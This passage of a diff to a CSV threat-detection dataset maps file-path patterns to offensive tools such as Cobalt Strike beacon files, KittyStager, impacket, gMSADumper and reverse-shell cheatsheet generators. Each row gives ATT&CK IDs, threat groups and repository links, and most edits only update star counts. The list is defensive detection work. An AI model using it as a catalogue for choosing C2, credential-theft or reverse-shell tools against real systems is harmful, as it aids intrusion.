tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/get-desc-users.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/getLegit/cdnl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/prvw*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/tsom*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/getLegit/zijz*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/get-loggedon/*.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/get-shucking.php*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" -"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/getST.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/get-system/getsystem.c*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/GetWebDAVStatus_BOF/*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" -"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. 
Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43232","5251","2023-10-01T16:10:19Z","2019-03-01T03:27:48Z" -"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*/ghidra*","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. 
Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Frameworks","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","10","43256","5253","2023-10-04T16:39:02Z","2019-03-01T03:27:48Z" +"*/ghostfile.aspx*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*/GhostInTheNet.git*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet.sh*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*/GhostInTheNet-master*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" -"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ghostscript/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/gimmeSH.sh*","offensive_tool_keyword","gimmeSH","gimmeSH. 
is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*/giop-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/GithubC2.git*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" 
@@ -3680,20 +3695,20 @@ "*/glit-core*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*/globeimposter.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*/GMSAPasswordReader.git*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" -"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network 
Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management 
frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool 
written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - 